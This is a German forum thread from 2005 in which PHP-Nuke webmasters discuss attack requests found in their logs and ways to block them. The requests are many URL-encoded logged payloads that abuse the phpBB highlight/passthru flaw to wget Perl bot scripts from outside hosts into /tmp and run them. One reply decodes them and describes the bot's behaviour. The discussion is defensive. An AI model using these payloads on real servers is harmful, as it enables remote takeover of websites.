Hacker unterwegs...

Begonnen von soxin, 07 Januar 2005, 00:37:04

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

soxin

Hi,
seit tagen werden meine Nukeseiten bombadiert mit Hackangriffen.

Wer hat noch dieses Problem???

Sie versuchen über  /modules.php?op=modload&rush über wget eine datei reinzuladen..

Zum Glück ist das bis jetzt noch nicht passiert..

Einige Auszüge:

ZitatIP: 83.246.112.26
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

ZitatIP: 130.230.88.16
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20atxxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

ZitatIP: 212.100.254.201
  URL: /modules.php?op=modload&rush=echo%20_START_%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';

ZitatURL: /modules.php?op=modload&rush=echo%20_START_%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';

Zitat  IP: 210.245.161.135
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

Zitat  IP: 65.75.177.60
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';


Hat jemand eine Ahnung was damit erreicht wird.. ??

Wie kann ic´h solche Hackangriffe abwehren?
8O DANKE

jubilee

#1
Hallo !
Ich würde fast sagen, er versucht eine Session-Datei in Dein /tmp-Verzeichnis hochzuladen.
Zitat
/modules.php?op=modload&rush=echo _START_; cd /tmp;
wget XXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;
wget XXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611112;
rm sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611111;
rm sess_189f0f0889555397a4de5485dd611111; echo _END_&
highlight==passthru($HTTP_GET_VARS[rush]);

(urldecode("%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20") = echo _START_;)
(urldecode("%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&) = ; echo _END_&  )
( urldecode "%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\'") = =%27.passthru($HTTP_GET_VARS[rush]).%27  )
Versucht also jemand Dir eine fremde Session unterzujubeln.
Dass hier keine Misverständnisse aufkommen. In diesen Dateien stehen keine Sessioninformationen. Sie sehen nur wie Session-Dateien aus. Ich habe die Qiuelltexte der Dateien und es sind recht umfangreiche Perl-Scripte die schon einiges bewirken können.
Kann beim vkpmx nix passieren weil die Session in der Datenbank gespeichert wird.
Trotzdem @Tora: Wir sollten uns mal mit den anderen kurzschließen (rio z.B. ) ob da Potential drinne steckt.
Evt auch eine alte Sache, ich habs aber auf die Schnelle nicht gefunden,.
Den Servernamen habe ich ausgeixt, damit niemand auf "Gedanken" kommt.

MfG
jubilee

NeMeSiSX2LC

Soweit ich es noch weiss nutzt soxin kein MX
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1

RiotheRat

Moin jubilee,

ICQ ist an und meine neue Telenummer jag ich Dir mal per PN rüber ... liest sich erstmal bedenklich. Und die PERL-Schiene scheint sich zu verbreiten, ich denke da an die letzte Sache mit dem Highlight-Parser vom phpBB.

Liest sich erstmal nicht nach Script-Kiddie ...

RtR
Unaufgeforderte PNs & Emails werden ignoriert

Erst wenn die letzte Zeile Code verhunzt, der letzte Server gehackt und der letzte Script-Kidde befriedigt ist, erst dann, werdet Ihr feststellen, dass Nuke nicht sicher ist...

Andi

Moin :)

denke das ist immernoch der phpBB Exploit, in etwas abgewandelter Form.
Habe über Google folgende Seiten über das Thema gefunden:
http://voidmain.is-a-geek.net/forums/viewtopic.php?p=8501
http://castlecops.com/article5642.html

Unter anderem ist mir bei der Suche sogar ein Pyton-Script begegnet....
Da ist ganz schön was im Busch.

Betrifft in Nuke-Systemen m.E. bis jetzt nur das phpBB-Forum.
schön´s Grüssle, Andi

NeMeSiSX2LC

Oder halt Nuke seiten mit dem alten bbport drinne oder nicht?
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1

Andi

Zitat von: NeMeSiSX2LC am 07 Januar 2005, 19:57:02
Oder halt Nuke seiten mit dem alten bbport drinne oder nicht?
Hmm, eigentlich meinte ich das. Ob das ein port ist oder direkt in Nuke drin ist, da mache ich keinen Unterschied... Nuke halt....
schön´s Grüssle, Andi

NeMeSiSX2LC

PHP-Nuke ja weil mittlerwile gibts auch eine Nuke weiter entwicklung wo sowas nicht der Fall ist. Aber trotzdem den zusatz nuke haben. Nein ich mein nicht Postnuke
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1

jubilee

Hmmm ....
Die haben das Suchmuster im einen Script ein wenig verschleiert.
In der Tat wird in Altavista nach einer topic.php gesucht.
Eines steht jedensfalls fest. Wer es schafft, das 2 Script auf einem Server zu aktivieren,
der kann auf dem Server machen, was er will.
Er versteckt sich und versucht das beenden des Scriptes zu verhindern :
Zitat$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
Portscan auf "21","22","23","25","53","80","110","143"
IRC-Server wird initiert...
Shellzugriff wird versucht bzw. Ausgaben werden umgeleitet...
Es werden auch diverse Socketverbindungen eingerichtet.
Ich denke das ist eine Vorstufe um den kompletten Server zu übernehmen.
Also weitab von den Spielchen nur einige Webseiten zu löschen ....
Mfg
jubilee

Andi

@ NeMeSiSX2LC

Die Verbreitung von vkpMx, cpg-Nuke, nsn-Nuke usw. ist im Vergleich zur Verbreitung des Originals so gering, dass sich niemand die Mühe machen wird, speziell diese Systeme zu knacken.

Also ist diese Namens-Haarspalterei völlig uninteressant.

Es gibt hunderttausende betroffene Seiten. Und welcher Newbie-Webmaster achtet schon darauf, ständig das neuste Update drauf zu haben?
schön´s Grüssle, Andi

NeMeSiSX2LC

NSN ist auch sicher hart *scherz* Ja hast schon recht. Man sieht es ja oft genug hier. Axo gibts eigentlich was nach DAU und vor Newbie :D
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1

soxin

#11
Also ich verwende eine umgebaute Version von VKP 5.5 und auf einer anderen Seite eine umgebaute Version von 6.x ...

Ich habe in den letzten 30 minuten ca. 50 sicherheitemails bekommen

ZitatIP: 66.194.75.151
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%20sexxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 21:05:48

IP: 80.190.192.103
  URL: /modules.php?op=modload&rush=echo%20_START_%3B%20cd%20/tmp;wget%20sexxx.com/~private/a.txt;wget%20sexxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:57:08



IP: 69.30.194.70
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20xxx.com/~private/a.txt;wget%20sxxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:51:33


IP: 66.79.176.210
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20xxx.com/~private/a.txt;wget%20xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:47:06


IP: 66.246.218.32
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:18:50

IP: 82.192.75.160
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:10:39


Passiert da eigentlich irgendwas?
op=modload gibt es das überhaupt bei phpnuke?

ich habe in die module.php das mal eingefügt:

if($op=="modload")
{
echo"**UPS** YOU ; I WILL GET YOU!!!";
die;
}

Weiß aber nicht ob das angezeigt wird..

hat jemand eine Odee wie ich das stoppen kann?
Danke

Biker

Jooooo...geht! ;)



Gruß
Bernd
Detektei Martin - wir bringen Licht ins Dunkle!

Andi

MOin Soxin  :)

modload ist ein Überbleibsel aus alten phpNuke Versionen und hat eigentlich keine Funktion mehr. Zur Kompatibilität wird es aber noch in der modules.php abgefragt (auch im vkpMx) . Verschiedene Module verwenden diesen Übergabeparameter auch noch, z.B. das eBoard.
Die Cracker könnten das modload in der URL also auch weglassen, das hat keine Auswirkung.

Lies mal hier:
http://board.pragmamx.de/index.php?topic=11736.0

Hier steht ein einfacher Weg um den entstehenden Traffic zu verringern:
http://board.pragmamx.de/index.php?topic=11734.0
schön´s Grüssle, Andi

soxin

#14
Zitat von: Biker am 07 Januar 2005, 21:45:19
Jooooo...geht! ;)



Gruß
Bernd

@Bernd
wenn ich das eingebe:
Zitat/modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

dann geht es leider nicht..

@Tora, danke
Leider bin ich nun nicht schlau daraus geworden.
Das mit dem phpbb ist mir bekannt da ich auch ein phpbb forum laufen lasse (http://www.skype-forum.com) ..
was hat das nun mit dem Nuke zu tun

Wie kann ich das
Zitat/modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
stoppen.. bzw. abfangen .. mit

if($op=="modload")
{
echo"**UPS** YOU ; I WILL GET YOU!!!";
die;
}

geht es leider nur teilweise.

P.S.: Ich liebe dieses Forum, auch wenn es sich schon sehr verändert hat..
Schaue hoch zu Sascha  :(